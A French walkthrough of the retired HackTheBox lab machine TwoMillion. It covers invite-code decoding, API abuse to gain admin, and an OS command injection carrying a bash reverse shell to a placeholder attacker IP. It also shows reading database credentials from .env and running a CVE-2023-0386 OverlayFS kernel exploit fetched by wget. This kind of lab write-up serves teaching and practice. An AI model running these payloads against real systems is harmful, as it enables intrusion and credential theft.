
Write-up de la machine HackTheBox TwoMillion — abus d'API, injection de commandes et CVE-2023-0386
Compte-rendu de la machine TwoMillion sur HackTheBox — Abus API, injection de commande & CVE-2023-0386
| Champ | Détails |
|---|---|
| Nom | TwoMillion |
| Difficulté | Facile |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion est une machine Linux facile centrée sur l'ancienne plateforme HackTheBox. Elle implique le décodage d'un code d'invitation, l'abus de points d'API, une injection de commande OS, la découverte d'identifiants et une élévation de privilèges du noyau Linux via CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
Ports ouverts :
2million.htbAjouter à /etc/hosts :
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
La réponse est encodée en ROT13. Décodez-la :
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Générer le code d'invitation :
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
Inscrivez-vous sur http://2million.htb/register en utilisant le code d'invitation décodé.
Connectez-vous via le navigateur, récupérez PHPSESSID depuis les cookies (F12 → Application → Cookies).
Élevez vos privilèges à admin :
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
Vérifiez :
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
Démarrer le listener :
nc -lvnp 4444
Envoyer la charge utile du shell inversé :
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
Shell obtenu en tant que www-data.
Trouver les identifiants dans .env :
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
Connectez-vous en SSH :
ssh [email protected]
cat ~/user.txt
Vérifiez l'indice :
cat /var/mail/admin
uname -r
# 5.15.70 — vulnérable à CVE-2023-0386
Téléchargez et compilez l'exploit sur Kali :
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
Transférez sur la cible :
# Kali
python3 -m http.server 8000
# Cible
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
Exécutez dans deux terminaux sur la cible :
Terminal 1 :
./fuse ./ovlcap/lower ./gc
Terminal 2 :
./exp
Récupérez le drapeau root :
cat /root/root.txt
Ce compte-rendu est à but éducatif uniquement sur une machine HackTheBox retirée.
| Étape | Technique |
|---|
| Reconnaissance | Scan Nmap |
| Code d'invitation | Décode ROT13 + Base64 |
| Escalade de privilèges Web | Manipulation d'API → admin |
| Shell initial | Injection de commande OS |
| Mouvement latéral | Identifiants .env → SSH |
| Root | Exploit CVE-2023-0386 OverlayFS |